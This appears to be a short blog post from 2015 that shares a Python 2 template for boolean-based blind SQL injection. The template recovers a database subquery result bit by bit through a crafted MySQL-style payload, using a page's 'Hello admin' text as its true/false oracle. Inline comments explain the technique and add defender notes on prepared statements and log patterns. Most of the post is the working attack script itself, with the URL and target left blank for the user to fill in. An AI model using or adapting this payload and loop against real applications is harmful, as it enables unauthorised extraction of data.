Research
blind sql injection script template
Mungsul
2015. 2. 20. 06:56
#!/usr/bin/python
# Template that recovers the string result of a SQL subquery one character at
# a time through a boolean ("blind") SQL injection: every request asks one
# yes/no question, and the answer is read from whether the response body
# contains the text "Hello admin".
# Python 2 only (urllib2, print statement). `time` is imported but not used
# in this listing.
#
# Defender notes:
# - The payload opens with a single quote, so it presumably targets a request
#   parameter that the application concatenates into a quoted SQL string
#   literal; binding that parameter through a prepared statement removes the
#   injection point.
# - In access logs the loop appears as seven consecutive requests per
#   recovered character to the same URL, differing only in two numeric
#   positions, carrying URL-encoded substr/ascii/bin/lpad keywords and a
#   trailing %23 (the encoded '#').
import urllib2,urllib,time
# SQL expression (subquery) whose string result is extracted; left empty in
# the template.
target = ""
# 1-based index of the character currently being recovered.
x = 0
# Characters recovered so far.
answer = ""
while 1:
    x +=1
    # Character code of position x, rebuilt below from its individual bits.
    ch = 0
    # One request per bit, most significant bit first (i = 1..7).
    # NOTE(review): only seven bits are tested, so only codes 1-127 can be
    # reconstructed.
    for i in range(1,8):
        # Base request URL up to the injectable parameter value. Intentionally
        # left blank in the template, so the script does not parse until a
        # value is supplied.
        url =
        # Condition sent to the server: ascii(substr((target), x, 1)) takes the
        # code of character x, bin() renders it in binary, lpad(..., 7, 0)
        # pads it to seven digits, and the outer substr(..., i, 1)=1 tests
        # digit i. "or id='admin' and <bit test>" makes the admin row match
        # only when that bit is 1; '#' comments out the rest of the original
        # query (this looks like MySQL syntax; confirm against the target DBMS).
        att = "' or id='admin' and substr((select lpad(bin(ascii(substr(("+target+"),"+str(x)+",1))),7,0)),"+str(i)+",1)=1#"
        # URL-encode the payload so quotes, spaces and '#' survive in the query string.
        att = urllib.quote(att)
        url += att
        req = urllib2.Request(url)
        result = urllib2.urlopen(req).read()
        # The marker text is the true/false oracle: present means the tested bit is 1.
        if result.find("Hello admin") > -1:
            # Bit i carries weight 2**(7-i): 64 for i=1 down to 1 for i=7.
            ch += 2**(7-i)
        else:
            pass
    # All seven tests false is treated as end of string. The same happens when
    # the marker never appears for any other reason, in which case the loop
    # ends with an empty answer.
    if ch == 0:
        break
    else:
        answer += chr(ch)
    # Progress output after each recovered character.
    print ":) : "+ answer
print "END : ",answer
지금은 bit 연산을 이용하는 형태인데 언제든 변경할 수 있음. 유동적으로 사용하는 것이 더 나을 것 같다.